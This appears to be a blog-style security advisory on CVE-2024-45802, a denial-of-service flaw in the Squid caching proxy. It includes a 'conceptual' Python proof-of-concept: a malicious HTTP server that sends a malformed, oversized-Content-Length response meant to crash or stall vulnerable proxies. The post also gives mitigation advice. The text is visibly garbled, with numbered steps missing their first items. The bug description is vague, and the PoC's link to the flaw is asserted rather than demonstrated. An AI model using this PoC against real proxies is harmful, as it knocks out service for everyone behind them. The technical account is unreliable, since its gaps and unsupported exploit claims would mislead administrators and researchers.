Squid is a popular open-source caching proxy. It helps people and companies speed up web browsing, control internet access, and save bandwidth. Many businesses, schools, and ISPs use Squid to handle HTTP, HTTPS, FTP, and other protocols. But recently, security researchers found a serious vulnerability in Squid. Officially listed as CVE-2024-45802, this flaw puts users at risk of Denial of Service (DoS) attacks—potentially knocking users offline or blocking access to important services.

This post explains what the bug is, how attackers can exploit it, and how you can protect your Squid servers. We’ll use clear language, code snippets, and direct links to the official resources.

What is CVE-2024-45802?

- Vulnerability ID: CVE-2024-45802
- Product: Squid caching proxy

Discovered in: Version 6.9 and earlier

- Fixed in: Squid 6.10 (default build)

How the Bug Works

Squid acts as a “middleman” between clients (like browsers) and servers on the internet. When a client makes a request, Squid fetches it from the real server, caches it, and passes the response to the client.

The CVE-2024-45802 vulnerability involves the way Squid handles unexpected or badly formed HTTP messages from upstream servers. Specifically:

Squid does not properly check some inputs from the server.

- Sometimes, it releases resources (like memory or connection handles) too soon or fails to release them at all.
- Result: Attackers running a “trusted” web server can send specially crafted responses that cause Squid to crash or stall, blocking all clients who rely on it.

#### In other words: If you use Squid as your gateway, and you access (even accidentally) a malicious or buggy server, it can take down your proxy. No one using that Squid instance can browse until it’s restarted.

Exploitation Details

While attacks require the attacker to control a server that your Squid proxy accesses (or to compromise one), this is not a high bar in enterprise, ISP, or school situations. For example, just browsing to a bad site or loading a tainted ad could trigger the bug if the proxy fetches from the attacker’s server.

The attacker controls evil-server.com.

2. A client (behind Squid) requests an innocent-looking page that fetches data from evil-server.com.

Proof of Concept

Here's a conceptual Python script for a malicious server that might trip up a vulnerable Squid proxy. For demonstration purposes only—do not use against others!

# Simple malicious HTTP server to crash vulnerable Squid proxies (CVE-2024-45802 concept)
import socket

HOST, PORT = '...', 8888

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen(1)
    print(f"Listening on {HOST}:{PORT} ...")
    conn, addr = s.accept()
    with conn:
        print('Connected by', addr)
        # Send incomplete/malformed HTTP response
        malicious_response = (
            "HTTP/1.1 200 OK\r\n"
            "Content-Length: 999999999\r\n"   # Unrealistic content length
            "\r\n"
            "Partial data with missing ending" # No valid end
        )
        conn.sendall(malicious_response.encode())
        conn.close()

A vulnerable Squid proxy fetching from this server may free resources early or hang indefinitely, affecting all users.

Squid Security Advisory (Fixed in 6.10):

Squid official changelog v6.10

CVE Database Entry:

NIST CVE-2024-45802
Xforce Exchange

Squid Main Site:

http://www.squid-cache.org/

Update to version 6.10 or later. The bug is fixed in the default build configuration of 6.10.

See: Squid 6.10 Download

2. If you must use earlier versions, try *not* to cache unknown or untrusted servers, but this is risky and not always practical.

3. Monitor your proxy and logs for crashes or strange stalls after fetching content from external servers.

4. Limit access to the proxy, if possible, to reduce the risk from internal threats or compromised trusted servers.

Conclusion

CVE-2024-45802 shows how even mature, trusted software like Squid can have tricky bugs with major real-life impact. Denial of service can be catastrophic, especially when trusted infrastructure like proxies go down. The fix is available. If you run Squid, update to version 6.10 immediately and keep your server maintained.

- Squid Security Advisories
- Squid Download Page
- Full Changelog for Squid 6.10


Have questions about Squid security? Leave a comment below!

Timeline

Published on: 10/28/2024 15:15:04 UTC
Last modified on: 01/03/2025 12:15:26 UTC